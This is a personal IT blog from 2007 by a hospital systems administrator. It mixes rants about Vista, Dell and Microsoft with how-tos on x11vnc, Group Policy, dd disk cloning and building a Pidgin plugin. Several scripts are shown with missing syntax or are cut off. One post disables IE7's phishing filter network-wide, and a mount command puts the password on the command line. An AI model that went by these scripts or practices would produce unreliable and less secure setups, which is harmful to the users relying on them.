Thursday, November 29, 2007

News Flash : Vista Is Terrible

You are probably sick of reading it and I am sick of saying it but Vista is very, very bad. My latest gripe is all the new error messages that I seem to be generating. This takes me back to the days of old with Windows where you get a message that makes absolutely no sense at all, which also supplies you with the sense that someone will do something about it, and then leaves without giving much more detail (only to reappear in an hour or so).

Here is one ...

A program stopped working. I knew that all ready though, because it went away when it crashed. The error message indicates that Windows will notify me of a solution. But when I "close program", I don't get any notifications. I guess they will track me down and call me. One day I will get a call from an engineer who has a solution to the 3,000+ crashes I had this year.

Here is another ...

It seems that "some program" which wants to remain anonymous is trying to tell me something, but it simply can't. Oh the suspense! Should I be reminded later? What if the program has something really important to tell me? Unfortunately I didn't click the "Why does this happen?" link. I will never know the crackpot reasoning behind the message. It ended up being a browser window which was trying to refresh it's advertisements.

More worthless error messages to come!

Sunday, October 28, 2007

The Desktop Revolution

Apple started it. Many years ago, they released OS X. Everyone marveled at the new effects and tools that it brought, and suddenly Microsoft began to show an interest in giving their desktop products a long overdue makeover. Pretty soon, Windows XP was "all the rave". It was met with a lot of resistance by the business users who were probably correct in saying "Windows 2000 seemed to run faster ... and I don't need these effects to do my job".

Apple continued to build upon it's success in OS, releasing a new version nearly every year for five years. Each time, outdoing itself with innovative new features that provided new tricks for the user, but also looked *really* good doing it. Microsoft answered with "please wait". Once they felt that they had caught up, they release Windows Vista. Even with the BETA releases it was obvious that Microsoft would never keep up with the "design wars" that laid ahead. Windows Vista simply duplicated a few effects that they liked from OS X but also tried to sneak in a software-crippling security overhaul. This has of course left most users demanding "I want Windows XP back".

Meanwhile, open source groups have aimed to out-do the commercial software companies when it comes to good looks. And why not? Linux after has been built and is maintained by the people, for the people since it's inception. It's the democracy of software. If something bombs and doesn't work, it either gets fixed or becomes "deprecated". Developers can work together on projects and build code at all hours of the day and night using systems that they developed earlier on. So it shouldn't be any surprise that the race to come up with the best looking desktop will be plaid out on open source platforms.

If you work in or around IT, or you have a nerd for a friend, you have no doubt heard of Beryl. Beryl was an experiment in using a commercial graphics card to create mind-bending effects for simple window and desktop management. It got a lot of attention. As did the Compiz project which aimed to do similar effects. Eventually they merged the two projects allowing the user to get the best effects from each collection, and possibly a little more stability. The result is "Compiz Fusion".

I must admit I was fascinated watching YouTube videos like this one. Windows Vista has a "tile effect" that let's you stack windows at an angle. Compiz allows you multiple desktops on a rotating cube, window-tabbing, OS X "expose" style arrangements, and more. Do I need all that to enjoy my computer? No. In fact, with these state of the art effects come a slew of bugs and crashes. After all, the code you are using to demonstrate effects like these were written by dozens of different people and were assembled moments later to begin experimenting with them. Still, someone like me sees a demonstration of the effects and I am all ready working on getting them running on my PC.

I am not the only one amused. Search YouTube for "compiz" and you will find that these videos are getting hundreds of thousands of viewings. Take a look around the forums for popular Linux distributions like Ubuntu and you will find that they are plagued with questions from folks who are fighting through crashes and panics to get these effects on their screens.

The war wages on, and yet the real casualties here are going to be "the business desktop user". Remember that attention like this does not go un-noticed. Shareholders will demand that commercial products implement the "fire painting" that their nephew was showing off. Microsoft will quickly attempt to duplicate the feature and put it into their home version of Windows Vista. The business users who purchased Vista Ultimate edition (and have little show for it at this point) will demand that it also be available to them. Before long, I will be rolling through group policies, user complaints, and help desk calls trying to stop the madness. Of course when I am done at work, I will go home, fire up Linux, and begin experimenting with effects that are years ahead of anything that Microsoft has done.

If you still haven't watched it yet, you owe it to yourself to see what all the fuss is about: Note that the video ends with "I have to admit: I made this with iMovie". Credit to Apple, where credit was due.

Tuesday, October 23, 2007

Starting x11vnc Easily

I had a friend recently ask me how I share out my desktop in Linux so that I can log in and run things remotely. I told him that I use a tool called "x11vnc" which allows you to share out an X-Windows session that has all ready been started. This is different than the normal VNC server functionality for Linux, which is to start an all new X-Windows session for remote access.

Using your default display allows you to get back to whatever you left running at the house. Perhaps a web page you were on at the time, a few bit-torrents that you want to check up on, etc.

In trying to share my method I had to confess that I really don't know how I made it all work. I was up late one night when I finally string together a command which got the desktop shared. Since then, I had been copying and pasting commands from a text file that I had saved away. The text file has now perished in a re-installation so I finally took the time to figure this all out again. This time, I have written a sensible shell script which I will document here for my friend Rob, and for anyone else who might be interested.


# Set this to your username
XAUTH=`/usr/bin/ls /var/run/xauth`

# Are we root, or just some schmuck?
if [ $(whoami) = "root" ]
# Now, do we have a password file created?
if [ -e /home/$USERNAME/.vnc/passwd ]
x11vnc -shared -display :0 -auth /var/run/xauth/$XAUTH -usepw -forever
echo -e "You have not set a password yet, run: x11vnc -storepasswd as $USERNAME."
exit 1
echo "You need to be root to do this (or use sudo -b ./startx11vnc)."
exit 1

exit 1

This script requires root permissions, and does the usual griping if it's run as a regular user. It then goes out to see if the person running it has all ready created a VNC connection password. If not, it gripes some more but drops a hint on how to create one. If running this as root, and you have a password file created, we then go out and find your xauth file. This file is needed to point x11vnc to the active running session. With that, we finally launch x11vnc and begin sharing the desktop.

Notice that to run x11vnc, the script suggests using "-b" which will allow the sudo command to ask for the password, and then politely launch the program into the background. In doing so, you can safely close the terminal window that you launched this command from.

Although wouldn't it be nice if this ran every time you logged on? Oh, I will have to work on that now.

Sunday, October 21, 2007

Dell's DeVo

I thought with all the advancement of modern-day "personal computers" that I might celebrate some de-evolution. Namely, by one of the biggest players in the market: Dell. More so, this is a short list of things that I have grown to hate Dell for and I need a place to gripe about it.
  • Upside-down, and angled USB ports - For several years Dell built a line of PC's with USB ports that were impossible to plug anything into. That's because the ports were flip-flopped from what they should have been, then angled at 45 degrees, and then covered with a plastic "hood" that had to be pulled up. Other than the fact that it reminds me of the deck lid on a Volkswagen Beetle - there is no benefit to this awful design flaw. If your PC was sitting on the floor (which it probably was, because the case was so damned big) you practically had to do a hand stand to plug in a jump-drive.
  • Dysfunctional Mouse Pads - How can you possibly screw up with a rubber matted piece of canvas? By plastering your logo onto it in high contrast colors then slapping some odd-ball reflective coating onto it which gives it a "shiny" appearance. The effect was that every time your optical mouse struck the lower right corner of the Dell logo, it repositioned itself on the screen. Today, I still occasionally find one of these mouse pads on a users desk and send it directly to the garbage. It seems that there are a lot of users with far more patience for something like this than me.
  • Ghost Mouse Syndrome - My poor father was the first to discover this flaw in Dell laptops. It seems that the mouse had a funny way of creeping around on it's own. Most attribute the problem to an oversensitive glide pad, which many other conspire that your mouse was being controlled by the souls of dead slave laborers from China. Aside from the creepy effect, the mouse would sometimes click itself too, causing a drag-over and delete effect on whatever you happened to be typing. I called Dell about it (not expecting much action). Dell said "plug in an external mouse". I asked "what if you're on an airplane or something?". Dell responded "you can also disable it in the BIOS". Ah yes. Problem solved. Dad can survive on Alt+Tab, Alt+F4, and other quick-key combo's.
  • Peek-A-Boo 15 Inchers - Oddly, just after the warranty had expired ... I saw a large number of 15 inch LCD displays being sent to the garbage. They seemed to come down with a case of "peek-a-boo". That's where your screen suddenly goes black. Just about the time you are picking up the phone to call the IT department, it comes back. Eventually, it goes black every thirty seconds or so making work impossible. Dell was aware of some sort of flaw in the devices but since these are "old news" they have made no attempt to assist anyone with one of these dying pieces of garbage. But if you call them, they can assist you in finding someone in your area who will recycle the components at little or no cost.
  • Case Bloat - Bigger is better! And titanic cases are back in style. Introducing the largest PC on the market - the GX-745 series. When you drop a few thousand dollars into a new PC these days, you expect to get your moneys worth. Dell sells that illusion by sending you an over-sized boat anchor. They seem to have forgotten how often office workers are relocated, and how many of us literally try to put these things on our backs to get them around. Sure it's nifty that the lid pops out of the side, and I have all sorts of little green tab things instead of screws. But all that extra plastic and aluminum make up for another 20 pounds and I fail to see how the bulk gives it any better of an appearance. Here's a neat trick - you can stack them. The tops are beveled to fit the bottom of another. We have had fun stock piling these our store room at work. Because nobody wants one, and those who do want one can't fit it into their desk.
  • Windows Vista> - In Dell's defense, they will still sell you a PC with Windows XP on it. But expect your laptop or desktop to still feature a prominent "Windows Vista" sticker on it. If I need to tell you why Windows Vista is a bad thing, you obviously haven't been subjected to it like I have. I will save that for another gripe session.

I'm sure you could think of a few reasons you hate Dell. Feel free to chime in with the comments feature.

Monday, October 15, 2007

Die Phishing Filter!

Every time I set up a new XP workstation, I give it all the appropriate updates which includes Internet Explorer 7. I have to imagine that users who are not familiar with IE7 (damn near everybody) gets a little confused and perhaps even concerned when they start seeing "check this site for phishing" dialog boxes. This feature, while it's intentions may be good, does nothing but causes me additional phone calls.

This morning I looked into how I might get rid of this feature once and for all - everywhere on my network. It turned out to be quite involved, and I didn't find many good resources on this topic. So here are some helpful tips for anyone else out there that would like to disable the phishing filter using group policy.

1) Install the additional IE 7 Group Policy Templates. You may all ready have this template if you are running Vista. If you are running Windows XP, you can download them here.

2) If you had to download and install the template (XP users) you will need to perform this step. Otherwise, go to the next one. Open up your Group Policy Editor and expand Computer Configuration. Now right click Administrative Templates, and then choose "Add/Remove". You can then click "Add" and browse out to the Template that you installed in step 1. It should be called "inetres" (it will have an invisible .inf extension).

3) Now, expand Administrative Templates, Windows Components, and select Internet Explorer. Check the details on the right. You should see "Turn off managing phishing filter". Read the text in the explanation box to ensure that you understand what is happening here. If you really want to be done with this forever, you should set this to "Disabled".

Now allow me to step on my soapbox for a moment here. If you are going to deploy a change like this through Group Policy, you should create a new policy to do it. Don't use the Default Domain Policy. When you create that new policy, name it something sensible such as "IE7 Disable Phishing Filter" or just "IE7 Settings". You never know when some other poor uneducated administrator may have to take over your job and figure out what the heck you did to their network.

You can find more good information on this topic from this Microsoft Technet article.

Sunday, October 07, 2007

Going from IDE to SATA in Linux

A few years ago now I was shopping for a new motherboard and processor combo to perform an in-case upgrade to my outdated PC. One of my decisions was between two different motherboards. The only noticeable difference was that one supported SATA drives and the other was strictly IDE. It was an extra seven bucks for the SATA board ... so I went ahead and bought that one.

Since then I have only ever used IDE drives as that was all I had available, and I wasn't trying to spend any more on the upgrade than I had to. But I recently was gifted an 80 gig SATA drive. Now all I had to do was to get all of my data onto it. Luckily the IDE drive that the SATA drive is replacing is the same size: 80 gigs.

I put together a plan to completely "clone" my present system and copy all of my data onto the new SATA drive. This would keep me from having to migrate my data away, reinstall Frugalware Linux, and then put all of the data back. My plan worked surprisingly well, so here is what I did. I hope that this will help someone out there who stumbles upon this in a Google search.

1) First, I simply installed the drive (physically) and checked to ensure that the BIOS was detecting it correctly. That part was relatively simple. Then, I booted as I normally would.

2) Once I was booted into Linux, I opened up a terminal and ran the following command ...

dd if=/dev/hda of=/dev/sda bs=32768

That command in a nutshell, copied every single track from the IDE drive (hda) to my SATA drive (sda). It created a complete clone. This would have also worked had my new drive been larger (but not smaller, as that would produce an out of space error). The problem would have been then that the new partition did not fill the drive. You would have to use a partition editor to fix this problem, such as gparted. I should note that copying 80 gigs takes a pretty long time. About as long as it would have taken to low level format the IDE 80 gig drive. In my case, it was about 1 hour and 10 minutes.

3) Now that I have cloned my drive, I needed to make sure that Linux knows to boot from it. For that I first mounted the new partition. In my case, sda1 was the "data" partition on my SATA drive, and sda2 was the "swap" partition.

mkdir /mnt/newdrive
mount /dev/sda1 /mnt/newdrive
vi /mnt/newdrive/etc/fstab

My /etc/fstab file looked like this:
none /proc proc defaults 0 0
none /sys sysfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
usbfs /proc/bus/usb usbfs devgid=23,devmode=664 0 0
tmpfs /dev/shm tmpfs defaults 0 0
/dev/hda2 swap swap defaults 0 0
/dev/hda1 / ext3 defaults 1 1
/dev/hdc /cdrom iso9660 user,noauto,ro 0 0

All that was necessary was to change the hda drives to sda drives. The final product looked like this:

none /proc proc defaults 0 0
none /sys sysfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
usbfs /proc/bus/usb usbfs devgid=23,devmode=664 0 0
tmpfs /dev/shm tmpfs defaults 0 0
/dev/sda2 swap swap defaults 0 0
/dev/sda1 / ext3 defaults 1 1
/dev/hdc /cdrom iso9660 user,noauto,ro 0 0

Make sure you save your changes, and quit.

4) Next I rebooted. Upon booting up, I went into the BIOS and changed by boot order so that it tried to boot from the SATA drive first. It did! At the Linux boot prompt (grub) I had to stop it from booting, and change the boot options. It was going to boot with "root=/dev/hda1", so I had to change it to "root=/dev/sda1". Having made the change, I booted right up!

5) This was a good chance to make sure that everything worked. All my data looked okay, no errors at booting time, etc. I ran "mount" by itself to ensure that I really was running from my SATA drive at this point ...

ray@frugal:~$ mount
/dev/sda1 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw,devgid=23,devmode=664)
tmpfs on /dev/shm type tmpfs (rw)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/dev/hda1 on /media/disk type ext3 (rw,nosuid,nodev)

6) Having confirmed that this would work from here on out, I needed to make a change to grub so that it boots from the SATA drive from now on (and I wouldn't have to change the root line every time I booted).

vi /boot/grub/menu.lst

In the grub booter file, all I had to change was "hda" to "sda" in the applicable place. In the end, my boot file looked like this:

# /boot/grub/menu.lst - configuration file for GRUB
# This file is generated automatically by grubconfig

gfxmenu (hd0,0)/boot/grub/message

title Frugalware 0.6 (Terminus) - 2.6.20-fw4
kernel (hd0,0)/boot/vmlinuz root=/dev/sda1 ro quiet vga=791

title Memtest86+
kernel (hd0,0)/boot/memtest.bin

And that was it!

7) I reboot one more time, this time letting everything run it's course. The BIOS detected the drive ... Frugalware Linux came trying to boot from the correct drive ... and I booted (much quicker than before thanks to the obvious SATA speed advantages).

In closing: This was a "poor mans cloning process". Normally I wouldn't recommend cloning a system that was running. But there weren't any notable side effects. The only issues I found were that my Firefox settings seemed to be lost. The first time I fired it up after this process, I had to re-enter some passwords and such for my various Firefox add-ons. Most likely this was from having those files open and in use when they were copied from one drive to the other.

Was any of this helpful to you? Drop me a line and share your experiences.

Friday, October 05, 2007

Sourcefire Purchases ClamAV

The Sourcefire Corporation has acquired the open source product ClamAV. ClamAV is a fairly user friendly and very well supported anti virus tool for the open source market. While the product hasn't seen much praise or attention, it serves as a pretty good competitor to commercial products by being an integrable component of an open source firewall and/or Intrusion Detection System. ClamAV often touts that it has fixes to virus's several hours and sometimes days ahead of the higher priced commercial competitors. I myself have built several personal use IPCop firewalls with ClamAV for gateway virus scanning.

Sourcefire hopes to make this open source product marketable and improve it's commercial successes. It also promises to maintain the open source nature of the product. Sourcefire has had successes in this same area with Snort, the Intrusion Detection System.

A full press release is available: here

Wednesday, October 03, 2007

Microsoft Wants You ... To Use Their MP3 Player

As if it weren't enough that they have taken over the home PC market and the business desktop ... they also want their software on cellular phones, video games systems, and MP3 players.

I don't know how you feel about this whole business, but the name "Microsoft" means everything but quality in my vocabulary. Their last attempt at an OS was Vista, which anyone will tell you is terrible (insert your digs here). My phone which runs Windows Mobile is practically unusable: mostly due to badly timed "Notifications" and the lack to do simple things like answer an incoming phone call. And their game systems? ... Well those seem to be okay! I love my X-Box original. Of course, I put a mod chip in it several years ago and most of my enjoyment comes from the Xbox Media Center software that I installed to it.

You may remember (or you may not) that Microsoft put out an MP3 player called the Zune a few Christmas's ago. A handful of anti-iPod types all ran out and bought one to get a taste of what was touted as "a new sharing experience". The perk in these devices was the ability to share music with your friends wirelessly. I was impressed with the concept. Advertisements featured pictures of young trendy people all standing around with headphones on - exchanging music with one another. But there is a catch. All of them would have had to have bought one of these devices (and most of your friends have all ready invested in an iPod). There were also some questions about Copyright. So naturally the device only let you "borrow" the music. In a few days time it vanished from your collection.

The device was anything but successful. It sold 1.2 million units (all together). The iPod passed the 100 million mark back in April of this year. Bill Gates was quoted as saying, "For something we pulled together in six months, we are very pleased with the satisfaction we got". Interesting. I wonder if he would say the same thing about the long awaited Windows Vista?

Asked what would be different about these new Zune devices Bill replied, "the satisfaction for the device was superhigh. The satisfaction on the software actually is where we’d expect to see a huge uptick this year. It was just so-so on the software side". So the good part about the device was the hardware, which was actually outsourced and engineered by someone else. The software (the only part that Microsoft actually worked on) was admittedly lackluster.

Microsoft plans to build a sharing community online where users can upload samples of songs, which can be downloaded and replayed on other Zune players. But only three times, then they go away forever. I don't expect users will spend much time hacking or trying to circumvent this protection when the same music is available for illegal download from so many other sources.

My message to Microsoft: Stop spreading out. Show that you care about, and are focusing on the areas in which you are all ready successful. Retool your Operating System so that you are no longer a successful "laughing stock" of the industry. And for God's sakes, leave your OS off of my portable devices. I don't have the patience to troubleshoot all of the problems you are creating and I am tired of having to explain to my user base that annoying features, and crashes are "by design".

Source: New York Times

Friday, September 21, 2007

Apple's OS X on a Dell Notebook

I remember hearing a long while back that a couple of guys had got OS X to boot up on generic Intel based hardware. It was a lot easier considering Apple ported their operating system over to the Intel platform with the intention of only using it for their specific machines (now with Intel processors). When it happened, it excited a lot of people. But the guys who put it together said "don't get your hopes up ... it barely operates".

Since then, there have been many late nights for a growing pack of nerds that insist on making OS X available for any old Intel based PC. While the process of getting OS X onto your PC may still be rather tricky, it's certainly getting easier. I probably spent 10 hours or more throughout the week going between two different hacked together distributions. I would boot to the DVD okay, get all the way through an installation, and then hit a big brick wall.

My frustrations were echoed by the thousands in the posts of other nerds who were also wasting away hours trying to make this work. "I get the white and gray Apple logo screen ... then it goes black". Me too. "After the install, it just stops at a blinking cursor". I've had that. "I got it installed, but nothing really works". Amen.

By the end of the day I had a fully working installation of OS X Tiger, with sound, and network support. The marriage between a Dell notebook and OS X was a rocky one, but I was surprised at how well it worked. The animations were a bit sluggish but web browsing with Firefox was quite impressive. In my mind I was thinking "this emulates really well!". But alas, there is no emulation here. This is OS X running natively ... on a Dell. How fun. Yet there is something a little weird about seeing such an elegant and well crafted operating system appearing over the "DELL" logo.

The question does remain though, "so you have OS X on your laptop ... now what?". The Intel based OS X has not been around very long, so there is a limited set of applications that work on it. If you were to buy an Apple computer, with the new Intel OS X installed on it, you would have an application called Rosetta. Rosetta makes it possible to run all of your Classic Mac applications by making use of some old Apple CPU tricks. Because you don't have those extra components in an Intel based PC ... you are not likely going to have Rosetta running smoothly (or at all) for some time.

In the mean time though, I can say this. Having OS X at arms reach in the office put a smile on my face. And while my co-workers were unimpressed, I was able to point out a few things like "Expose" and say "Here's that feature that Microsoft stole for Vista ... but didn't implement nearly as well".

Wednesday, September 12, 2007

Popular Searches

I've noticed a growing trend with sites that have created "popular result" links made up from keywords that folks used to search their site. It's often fun to know what people are looking for. The idea being that you may search a site and find information that you hadn't even imagined was available. It's also like peering into a dark hole in the wall, and seeing what people are really interested in finding. You may remember some time back when many search engines advertised a box that displayed the last ten or more words that folks searched for. The results were often so filthy and insulting that you won't find that feature in use any more.

So have a look here at the popular results from a photo-dump site which now supports word tagging. The bigger the word appears, the more often appeared in the results.

Now let's have a look at Microsoft's Live page, where the search results aren't actual ... but rather the text has been sized differently to give the illusion that they are real.

You can't fool me Microsoft, I know what people really search for. And while I doubt "mom" is truly a popular search, I am betting that "milf" is.

It looks like Microsoft is attempting to gain interest in their "Live" project, by allowing people to create MySpace-ish pages. While I am sure that they know they can't wrestle away the MySpace crowd, they are targeting parents who might be concerned about all of the filth on MySpace. In their recent "At Home Security" newsletter they say, "If your kids use social networking sites, help protect them from online predators by following the advice in this article". Naturally their advice starts with bringing your child to the safe havens of Windows Live Spaces.

Windows Live Spaces is an unapologetic MySpace ripoff, but with a few pluses. Number one, there is not nearly the amount of advertising. The pages seem to load in a reasonable amount of time, and I am not seeing the constant error pages that I get with MySpace who just can't seem to manage their popularity very well. When you create a Live page, you are combining a: blog, social network circle, photo album, and a profile. I may just have to try it out and see what all the fuss is about.

And by fuss, I mean the targeted Microsoft advertising - not the "buzz from the community" which went right on using MySpace and complaining about how bad it is.

Friday, August 10, 2007

Garnter Group Hates the iPhone

I think of the "Gartner Group" as a bunch of grumpy old men in suits. Like a team of Andy Rooney's running around complaining about how stupid everything is today (without bothering to offer an insightful observation about how to improve things). Part of the reasoning behind my perception of the Gartner Group is based upon a video I was forced to put myself through about "how to become a technical trainer". Thankfully, the Gartner Group gave up the "Certified Technical Trainer" process to CompTIA many years ago. The materials that they produced (a book, and a video) were: extremely outdated, hosted by two of the most entertaining men of all time, and gave genuinely bad advice about training. Not to mention, that their entire course had nothing to do with the IT training industry that we knew then and now. My opinion of these old guys in suits has not changed much.

It was no surprise to me that the Gartner Group hated the new iPhone - even before it was released to the public. Having suffered with one of the worst designed phones (and operating systems, Windows Mobile) of all time, I was looking forward to learning about how the iPhone might work out for a business. I couldn't Google around all of Gartner's lousy claims about why the iPhone is a bad business move. So I am going to address them here in direct response to some comments made by one Ken Dulaney. I should note that Mr. Dulaney claims to have 36 years of experience. For those keeping track, he has been in the IT business since 1971. When did we start calling it the "IT Industry" exactly? I am not counting my years working with Apple IIe's and TRS-80 Color Computers. Maybe I should put that crap on my resume.

He says: Lack of support from major mobile device management suites and mobile security suites
I say: Tell me one good feature that you need, that the iPhone doesn't have? I don't want a "suite" of anything on my phone. I want it to do what a phone should do, and not require a load of software to be added. How security conscious does one need to be with a phone? If you can put a PIN number on it to lock it, you're good. Any more than that and the users will turn on you.

He says: Lack of support from major business mobile e-mail solution providers
I say: What is a "mobile email provider"? The iPhone synchronizes with any POP/SMTP or IMAP provider. Any mail product including Exchange server has that capability. And you can try to shoot me down on IMAP as being "insecure" but it's used an encrypted authentication mechanism for many years (IMAP4).

He says: The operating system platform isn't licensed to alternative hardware suppliers so there are no backup hardware suppliers
I say: That's just what I want. A "cheaper" knock-off iPhone that is manufactured by GPX. Can I order one of those from CDW and have it tomorrow? Get real.

He says: Feature deficiencies, such as no removable battery, could increase the need for support
I say: Yeah, I remember the last time I took the battery out of my phone. Wait, no I don't. Because there is no need to. Guess when I last replaced the battery in my iPod which I have owned for five years? Never.

He says: At this point, it's only available from one U.S. operator
I say: He makes a good point here. But let me tell you something. I live in a tiny town, and I have the worst cell phone coverage possible. I have used both Sprint (Embarq) and Verizon and they both suck. The few folks here who have AT&T coverage say that they never slip beneath two bars, where as I lose signal completely in those same areas. Perhaps Apple wanted to go with a provider that they felt delivered the best service, and not offer phones to providers who would make them look bad. I am going to award that point ... to Apple. Sorry Ken.

He Says: It's an unproven device from a vendor that's never built an enterprise-class phone or mobile device
I say: I have a UTStarcom phone manufactured by Intel, and with an Operating System from Microsoft. It's the worst gadget device I have ever owned to the point that I can hardly take a call on it. I want to track down all the engineers who had a part in making this phone and beat them with it. Which would hurt, because it's so big and heavy. Remember that company called "Apple" who made an MP3 player? And how did that compare with those experts who made the "Rio"? Anyone bought a "Zune" lately? I rest my case.

He says: A high price estimated at $500
I say: Hogwash. My phone was $400, it's only 2 months old, and I couldn't get ten dollars for it. Not to mention, it's all ready "unsupported" by the vendor. Perhaps we could agree that cell phones in general, cost too much.

He says: A clear statement from Apple that it's focused on consumer, not enterprise, business
I say: That was a mistake. Apple didn't expect business customers would come looking for one. They perhaps didn't survey what business customers think about their cell phones. I read a lot of angry comments from people who bought a "gadget phone" and can't make a simple phone call because of lock-ups, lost signals, prematurely dead batteries, etc. I am one of them.

He concludes with: IT "isn't prepared for that right now," Dulaney said. "Apple simply hasn't supplied the tools they need to consider handling this. I think those tools are at least six months out."
I say: Let's do this again in six months. Now stop spamming everyone with your opinions and get back to your old man club. I think they just put in a VHS tape of something starring Walter Matthau.

-Steve Ballantyne

Thursday, July 12, 2007

Lexmark Jams on Wrist-band Labels

In our hospitals Emergency Department and Registration area we have a few Lexmark printers with multiple trays. One of those trays is for printing out a sheet of labels, along with a plastic wrist-band to be worn by the patient. We have had a lot of trouble with the Lexmarks jamming up and eating the wrist-band sheets so I finally took one apart and had a look.

The hospital does a lot of printing. We often have to pull the printers apart and clean the rollers. For the Lexmarks, these are little black wheels with white rubber tires stretched over them. The white is nice, because it allows you to visualize any dirt, dust, or other stuff that has built up on the wheel. Every little bit will detract from it's sticky nature - and bring it that much closer to a paper jam.

While cleaning the rollers in one of the trays, I noticed that one of the wheels falls right onto the "slick stripe" on the wrist-band sheets. If I forced the rollers to try and pick up one of these sheets, it almost fed sideways. It's not rocket science. One wheel pulls a little stronger than the other (which slips) and the paper feeds at an angle, if at all. I decided that since we had a spare tray I could do a little re-engineering.

What I ended up doing was removing the black rod that the wheels attach to and continuing the groove pattern that allowed the wheel to remain stationary on the bar. Continuing the groove pattern all the way to the end of the rod allowed me to push the wheel back on, and keep pushing it all the way over to the end. Now, with the wrist-band label sheets inserted I was just able to clear the "slick spot".

Thinking I was done, I plopped the tray back into the printer and drummed up a wrist-band. Bleep-bleep-bleep! Instant jammage. I would not get off that easy. It turns out that there is a little plastic bar that floats easily up and down on the paper stack. My wrist-band sheet was wrapped around it as it was not clearing my new wheel properly. I am betting that this is the "you are almost out of paper" indicator which I could remove all together and not have any issues. But, I would rather do things right. So out came the tray, and back to the shop I went.

Our maintenance department has a wide assortment of tools. I have asked for some pretty bizarre materials, glues, and tools - which they have always been able to supply. So when I asked for a "heat gun" I figured they would have one somewhere. And they did. In fact, they had two. It would take a bit of searching to find one of them but it did eventually surface. And with that, I went to work on melting this little bar to make it fall left of the wheel. The end result was this ...

At this point, it was 5:00PM and I was not on call. Rather than "test" this tray on someone else's on-call duty - I decided to wait until morning. This morning the tray went in ... and no calls were made. They've been printing on it for several hours without a single jam (knocking on wood). I would consider that a success. And now I have to work on patenting this process or as one of my co-workers suggested, patent an adjustable feeder bar so that no-one would ever have to do something this silly again.

-Steve Ballantyne

Saturday, July 07, 2007

MySpace IM on Linux

MySpace has had an instant messaging functionality for quite a while now. Most of us didn't notice when this happened, as we all have a dozen other instant messaging protocols that we fight about. But recently, my son became a MySpace addict and suggested that I install the MySpace instant messenger so that I can chat with him. Yet, not much to my surprise, there is no MySpace instant messenger for Linux. Bummer.

Thankfully a thoughtful developer has made this possible through a plugin that he has written for use with Pidgin. Pidgin for those of you who haven't kept up, is what used to be known as "GAIM". The name change was made in part due to some lawsuits from the AOL folks. There were some cosemetic icon changes as well which I was not particularly fond of. That is, you used to be able to view all of your buddies with icons to the left of their name which indicated which messenger they were using. The AOL buddy icon represented AIM, the Yahoo "Y!" for the Yahoo IM, and so on. Now, those icons and the option to use them has all been removed. Again, we can thanks the lawyers for that one.

My first step in this process was to track down the Pidgin MySpace code. It was relatively easy to find. You can grab it from here: Then, I went after the main source code for Pidgin. It was found here: At the time of this writing, Pidgin was at version 2.0.2 (which was one version higher than what the MySpace plugin was written for, 2.0.1).

I started by untarring, and unzippnig the Pidgin source code as "pidgin-2.0.2". Then I cd'd into that directory and ran a ./configure and a make (the usual way). Next, I extracted the "myspace" source code and moved it into /pidgin-2.0.2/libpurple/protocols/. Then, I cd'd into the /pidgin-2.0.2/libpurple/protocols/myspace directory and tried to run "make" as instructed. Boom! Error message.

The error message seemed to stem from these lines in the Makefile for the MySpace plugin ...

Makefile: $(srcdir)/ $(top_builddir)/config.status
cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)

Not really understanding what this was trying to accomplish ... I took the easy way out and just commented out the second line with a "#". So my Makefile read like this ...

Makefile: $(srcdir)/ $(top_builddir)/config.status
# cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)

Then I ran "make" again, and it was compiled without any errors.

The rest was easy. I went back into /pidgin-2.0.2 and did a "sudo make install" to get the main Pidgin component installed. Then, I went into the /pidgin-2.0.2/libpurple/protocols/myspace directory and did a "make install" again. That's because the other protocols were known by the installer, and installed all ready. But the MySpace plugin was "snuck in" by me.

Now for the fun part. I started up Pidgin and verified that everything was working okay. I set up and configured my AIM, Yahoo, MSN, etc, plugins and made sure that they were working. Then, I added a new MySpace account.

I wasn't sure what I was expected to use for credentials. GUessing that my Screen Name would be my login username and password for MySpace was the correct assumption. There was not much else to configure here. The second tab had some server information and proxy settings. I left all those alone. There was a curious "Use this buddy icon" option at the bottom, which did not yet seem to be functional (or perhaps I broke it). No worries.

Going back to the accounts window I ensured that I was "online" with this plugin. Immediately after activating it, I got a message telling me about a recent friend invite. Handy! It must be working.

Now I needed to add a "buddy". So I went through the usual means in the messenger, which is "Buddies > Add Buddy". I was asked for the buddies screen name ... I wondered what I was expected to use here. MySpace let's you call your profile whatever you want. But I have noticed that they keep track of you by your address: and they also assign you a number (which most folks don't pay attention to). I went ahead and brought up my son's MySpace page and had a look at these two figures.

For the screen name I tried the number first - and it seemed to work pretty well, although I bet the MySpace URL name would have worked too.

Now, I started up a conversation just to see if this whole thing really works.

We're good! I would expect a few problems with the functionality of this plugin. One, this plugin is really only intended for textual message. The MySpace messenger surely has a slew of odd buttons, smiley collections, animations, etc. None of that is going to work here. And I can't say that I really care. Also, if MySpace is like any of the other messengers - the developers will change up the protocol on a regular basis (with the intent on breaking anyone trying to chat without using their advertising plagued messenger).

Hope this helps someone out there. Enjoy. And message me on MySpace, would ya'? -

Tuesday, June 26, 2007

Automated Emailing of Files

It's not often that things slow down enough that I can catch my breath and record what I have worked on. I had plans of maintaining this Blog once I took my new position at the hospital. But by the time I have documented my work order, I am all ready onto something else.

But today I was able to put some time into a pet project. I had a staff member ask me if we could set up a scanner in the emergency room of the hospital, and any time someone scanned a document it would get emailed to a specific doctor. I figured that there was probably a piece of software for Windows that would do it. And I figured right. But I wasn't looking to shell out $129 - $1,000 of our department budget to get the job done. So I turned to my good friend, Open Source.

Here is a shell script I wrote that will look for the existence of a file, and if found - will ship it off to a lucky recipient by email.

Things to take into account:

  • I created a directory called /mnt/drnobody
  • I mounted //servername/SHARE to /mnt/drnobody/ with mount -t smbfs -o username=myusernamehere,password=mypasswordhere //servername/SHARE /mnt/drnobody/
  • I created a README.txt file which is used by my script to check and see that the share is still accessible

And now, the snippet!

# Dr Example Scan Script - Steve Ballantyne 6.26.06

# Check to see if the share is in place

if [ -f /mnt/drnobody/Sharedir/ER/DrNobodyScan/README.txt ]
# Share exists - so we check to see if a scanned document is waiting
